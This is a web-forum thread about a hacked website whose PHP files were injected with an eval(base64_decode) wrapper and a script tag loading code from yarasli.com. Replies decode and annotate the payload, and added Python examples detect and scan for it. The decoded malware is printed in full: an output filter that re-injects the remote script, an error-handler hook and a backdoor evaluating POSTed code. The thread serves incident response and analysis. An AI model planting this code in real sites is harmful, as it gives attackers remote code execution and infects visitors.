  1. #1 dujmovicv

    some website files got spywared!

    Hi ALL,

    I'd like to warn you guys! I was trying to implement a rewrite rule in a .htaccess file (mod_rewrite enabled); unfortunately, I'm not an Apache expert, so I suppose I created a security hole for a moment and some of my files got spammed!

    Code like this was inserted into some PHP files on my server:
    PHP Code:
    <?
    eval(base64_decode('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')); 
    ?>
    and

    Code:
    <script>
    document.write('<script src=http://yarasli.com/din/fprotatx.class.php ><\script>');
    I suppose that 'yarasli' guy made the intrusion.

    I finally managed to remove these lines!
    I will try to decode the above encrypted content; if any of you manage to do that before me, please PM me or post here! We may all benefit from my mistake, hopefully...

    Best wishes

    Full time ADMIN - art community
    Part time coder - dsign

  2. #2
    Follow Me On Twitter: @djg gold trophysilver trophybronze trophy Dan Grossman's Avatar
    Join Date
    Aug 2000
    Location
    Philadephia, PA
    Posts
    20,578
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    It decodes to this:

    PHP Code:
    if(!isset($rhse1)){
        // Output filter: strips other injected <script> blocks and hidden iframes
        // (competing malware), then re-inserts this gang's own script tag.
        function rhse($s){
            if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
                foreach($a[0] as $v)
                    if(count(explode("\n",$v))>5){
                        $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
                        if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))
                            $s=str_replace($v,'',$s);
                    }
            if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
                foreach($a[0] as $v)
                    if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))
                        $s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
            // The constant decodes to: <script src=http://yarasli.com/din/fprotatx.class.php ></script>
            $s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3lhcmFzbGkuY29tL2Rpbi9mcHJvdGF0eC5jbGFzcy5waHAgPjwvc2NyaXB0Pg=='),'',$s);
            if(stristr($s,'<body'))
                $s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
            elseif(strpos($s,',a'))
                $s.=$a;
            return $s;
        }
        // Error handler: calls the previous handler, then rewires PHP's output
        // buffers so every page passes through rhse() on its way to the browser.
        function rhse2($a,$b,$c,$d){
            global $rhse1;
            $s=array();
            if(function_exists($rhse1))call_user_func($rhse1,$a,$b,$c,$d);
            foreach(@ob_get_status(1) as $v)
                if(($a=$v['name'])=='rhse')return;
                elseif($a=='ob_gzhandler')break;
                else $s[]=array($a=='default output handler'?false:$a);
            for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
            ob_start('rhse');
            for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
        }
    }
    // Installs rhse2 as the error handler, keeping the previous one.
    $rhsel=(($a=@set_error_handler('rhse2'))!='rhse2')?$a:0;
    // Backdoor: executes whatever base64-encoded PHP arrives in POST parameter 'e'.
    eval(base64_decode($_POST['e'])); 
    And from what I can gather, once this script is in place, whoever knows it's there can run arbitrary PHP code on your server (to create new files, to send spam, etc) by POSTing the code they want to run to the script. Whatever they send gets decoded and executed by this script.
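
    Decoding a wrapper like this by hand is fine once, but it helps to have a tool that peels the eval(base64_decode('...')) layers, decodes the base64 literals hidden inside the payload, and says what the payload is capable of. The following is an added example written for this thread, not code posted by anyone in it. SAMPLE_FILE is a constructed stand-in for an infected file in the shape of post #1; SAMPLE_PAYLOAD is a cut-down stand-in for the decoded code above that keeps only the pieces that matter for triage (the hidden script tag, the error-handler hook, the output-buffer callback and the $_POST eval). The one real value in it is the base64 constant from the decoded code, which is what the script-tag indicator fires on.

```python
"""Decode and triage an eval(base64_decode('...')) PHP injection.

Added example, not code from the thread. SAMPLE_FILE and SAMPLE_PAYLOAD are
constructed; PAGE_SCRIPT_TAG_B64 is the base64 constant that appears in the
decoded code from post #2.
"""
import base64
import re

# eval(base64_decode('<base64 literal>')) with single or double quotes.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
# Any other base64_decode('...') literal: malware hides strings it later
# re-injects (here, a <script src=...> tag) behind these.
ANY_B64 = re.compile(
    r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")

# What a practitioner wants to know about a decoded payload, worst first.
INDICATORS = [
    ("backdoor: eval() of request data ($_POST/$_GET/...)",
     re.compile(r"eval\s*\(\s*(base64_decode\s*\(\s*)?\$_(POST|GET|REQUEST|COOKIE)")),
    ("hooks set_error_handler() so it runs on any PHP warning",
     re.compile(r"set_error_handler\s*\(")),
    ("installs an ob_start() callback that rewrites page output",
     re.compile(r"ob_start\s*\(")),
    ("re-injects a remote <script src=...> tag",
     re.compile(r"<script\s+src=", re.IGNORECASE)),
]


def decode_layers(php_source, max_depth=5):
    """Peel nested eval(base64_decode('...')) wrappers, outermost first.

    Stops at the first layer that has no further literal wrapper (for example
    one that evals $_POST data, which cannot be decoded statically) or whose
    literal is not valid base64.
    """
    layers = []
    current = php_source
    for _ in range(max_depth):
        match = EVAL_B64.search(current)
        if not match:
            break
        try:
            current = base64.b64decode(match.group(1), validate=True).decode("latin-1")
        except ValueError:  # binascii.Error is a ValueError: not real base64
            break
        layers.append(current)
    return layers


def decode_constants(php_code):
    """Decode the base64_decode('...') string literals inside decoded code."""
    out = []
    for literal in ANY_B64.findall(php_code):
        try:
            out.append(base64.b64decode(literal, validate=True).decode("latin-1"))
        except ValueError:
            pass
    return out


def triage(php_source):
    """Names of the indicators that fire on the decoded layers and their constants."""
    layers = decode_layers(php_source)
    text = "\n".join(layers + [c for layer in layers for c in decode_constants(layer)])
    return [name for name, rx in INDICATORS if rx.search(text)]


# Real constant from the decoded code in post #2 (decodes to a <script> tag).
PAGE_SCRIPT_TAG_B64 = "PHNjcmlwdCBzcmM9aHR0cDovL3lhcmFzbGkuY29tL2Rpbi9mcHJvdGF0eC5jbGFzcy5waHAgPjwvc2NyaXB0Pg=="

# Constructed: a cut-down stand-in for that decoded code, keeping the parts
# that matter for triage. Function names are the ones the real payload used.
SAMPLE_PAYLOAD = (
    "if(!isset($rhse1)){"
    "function rhse($s){return str_replace(base64_decode('"
    + PAGE_SCRIPT_TAG_B64
    + "'),'',$s);}"
    "function rhse2($a,$b,$c,$d){ob_start('rhse');}}"
    "$rhsel=(($a=@set_error_handler('rhse2'))!='rhse2')?$a:0;"
    "eval(base64_decode($_POST['e']));"
)
# Constructed infected file, shaped like the snippet in post #1.
SAMPLE_FILE = (
    "<?\neval(base64_decode('"
    + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    + "'));\n?>\n<html><body>site content</body></html>\n"
)

if __name__ == "__main__":
    for i, layer in enumerate(decode_layers(SAMPLE_FILE), 1):
        print(f"--- layer {i} ---\n{layer}")
        for const in decode_constants(layer):
            print(f"hidden constant: {const}")
    for name in triage(SAMPLE_FILE):
        print("indicator:", name)
```

    Run it against a real file by passing the file's contents to triage(). The "backdoor" indicator is the one that matters for response: anyone who can send a POST to a page carrying this code can run arbitrary PHP as the web server user, so changing FTP passwords alone does not close it; every copy of the wrapper has to go.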

  3. #3 skunkbad
    You need to shut down the site temporarily, clean up the files, change your account password and FTP password, use a secure FTP connection, and not store FTP username and passwords on your computer. Also check your computer and all computers on your network for viruses. I recommend MalwareBytes. It's free and will catch stuff that your antivirus didn't.

  4. #4 dujmovicv
    Quote Originally Posted by skunkbad View Post
    You need to shut down the site temporarily, clean up the files, change your account password and FTP password, use a secure FTP connection, and not store FTP username and passwords on your computer. Also check your computer and all computers on your network for viruses. I recommend MalwareBytes. It's free and will catch stuff that your antivirus didn't.
    Thank you for your replies!

    Which method is more secure for managing the server:
    1. SSH terminal
    2. Webmin through the browser?

    Regards

    Full time ADMIN - art community
    Part time coder - dsign

  5. #5 skunkbad
    As long as webmin through the browser is using a secure connection, then either would be fine. I had the same problem recently. My mom's computer was sniffing network traffic, and because it wasn't secure, it was sending my usernames and passwords to a bot net. That's why you have to change the passwords, not store them, and use a secure connection.

  6. #6 dujmovicv
    Quote Originally Posted by skunkbad View Post
    ... Also check your computer and all computers on your network for viruses. I recommend MalwareBytes. It's free and will catch stuff that your antivirus didn't.
    Thank you again!
    BUT how can I scan my remote Virtual Private Server (running Ubuntu server) for viruses???

    Full time ADMIN - art community
    Part time coder - dsign

  7. #7 dujmovicv
    Quote Originally Posted by Dan Grossman View Post
    It decodes to this:

    PHP Code:
    if(!isset($rhse1)){function rhse($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3lhcmFzbGkuY29tL2Rpbi9mcHJvdGF0eC5jbGFzcy5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function rhse2($a,$b,$c,$d){global $rhse1;$s=array();if(function_exists($rhse1))call_user_func($rhse1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='rhse')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('rhse');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$rhsel=(($a=@set_error_handler('rhse2'))!='rhse2')?$a:0;eval(base64_decode($_POST['e'])); 
    And from what I can gather, once this script is in place, whoever knows it's there can run arbitrary PHP code on your server (to create new files, to send spam, etc) by POSTing the code they want to run to the script. Whatever they send gets decoded and executed by this script.
    Well done Dan! But that sounds terrifying!!!! I stopped ALL the services on my server (SSH, Apache, MySQL, FTP); now I will have to clean up the code... And I don't know how...

    Full time ADMIN - art community
    Part time coder - dsign

  8. #8 skunkbad
    Quote Originally Posted by dujmovicv View Post
    Thank you again!
    BUT how can I scan my remote Virtual Private Server (running Ubuntu server) for viruses???
    The viruses would be on your computer or a computer on your network, but not the server. What's on the server is code inserted by somebody else that you will have to find. Try looking at the last modified times for all files. In my case, the damage wasn't very deep. Except for one site, they had only modified index.php and .htaccess.
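
    The mtime sweep skunkbad suggests is the right first move, and the question in post #6 (how to scan the VPS itself) has the same answer: list what changed recently, then grep every PHP/HTML/.htaccess file for the two injections quoted in post #1 whether or not its mtime looks recent, because an attacker who writes files can also reset their timestamps. The following is an added example written for this thread, not code anyone posted. It builds a constructed sample docroot in a temporary directory with one clean page, one infected index.php with a fresh mtime, and one infected page whose mtime has been backdated, and shows that only the content scan finds the third file.

```python
"""Find injected code on a web root: mtime sweep plus content scan.

Added example, not code from the thread. build_sample_site() creates a
constructed docroot; the signatures are the two injections quoted in post #1.
"""
import os
import re
import tempfile
import time

# Signatures taken from the two snippets quoted in post #1.
SIGNATURES = {
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "yarasli_script": re.compile(r"yarasli\.com/din/fprotatx\.class\.php"),
    "docwrite_remote_script": re.compile(
        r"document\.write\s*\(\s*['\"]<script\s+src=http", re.IGNORECASE),
}
SCAN_EXT = {".php", ".html", ".htm", ".js"}


def scannable(path):
    """Files worth grepping: web content plus .htaccess (which has no extension)."""
    name = os.path.basename(path)
    return name == ".htaccess" or os.path.splitext(name)[1].lower() in SCAN_EXT


def _rel(path, root):
    return os.path.relpath(path, root).replace(os.sep, "/")


def modified_since(root, cutoff_ts):
    """Relative paths whose mtime is at or after cutoff_ts (the mtime sweep)."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.getmtime(path) >= cutoff_ts:
                hits.append(_rel(path, root))
    return sorted(hits)


def scan_content(root):
    """Map of relative path -> signature names found, for every scannable file."""
    found = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not scannable(path):
                continue
            with open(path, encoding="latin-1") as fh:
                data = fh.read()
            names = [sig for sig, rx in SIGNATURES.items() if rx.search(data)]
            if names:
                found[_rel(path, root)] = names
    return found


def missed_by_mtime(root, cutoff_ts):
    """Infected files the mtime sweep alone would not have listed."""
    recent = set(modified_since(root, cutoff_ts))
    return sorted(set(scan_content(root)) - recent)


def _write(path, text, mtime):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="latin-1") as fh:
        fh.write(text)
    os.utime(path, (mtime, mtime))  # set mtime explicitly, as `touch -d` would


def build_sample_site():
    """Constructed docroot. Returns (root, cutoff_ts) with cutoff one week ago."""
    root = tempfile.mkdtemp(prefix="webroot_")
    now = time.time()
    month_ago = now - 30 * 86400
    # Clean page, untouched for a month.
    _write(os.path.join(root, "about.php"), "<?php echo 'about'; ?>\n", month_ago)
    # Infected page with a fresh mtime ('QUJD' is a constructed placeholder).
    _write(os.path.join(root, "index.php"),
           "<?\neval(base64_decode('QUJD'));\n?>\n<html><body>home</body></html>\n", now)
    # Infected page whose mtime the attacker backdated.
    _write(os.path.join(root, "blog", "post.html"),
           "<html><body><script>document.write('<script src=http://yarasli.com/din/"
           "fprotatx.class.php ><\\/script>');</script></body></html>\n", month_ago)
    return root, now - 7 * 86400


if __name__ == "__main__":
    root, cutoff = build_sample_site()
    print("modified in the last week:", modified_since(root, cutoff))
    for path, sigs in sorted(scan_content(root).items()):
        print(f"{path}: {', '.join(sigs)}")
    print("infected but missed by the mtime sweep:", missed_by_mtime(root, cutoff))
```

    On the VPS itself the same two steps are find /var/www -type f -newermt '<date>' and grep -rl 'eval(base64_decode' /var/www, run over a copy of the docroot rather than the live one. Neither step proves a file is clean; the reliable fix is to diff against a known-good copy (version control, a pre-incident backup, or the vendor's release archive) and redeploy from that.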

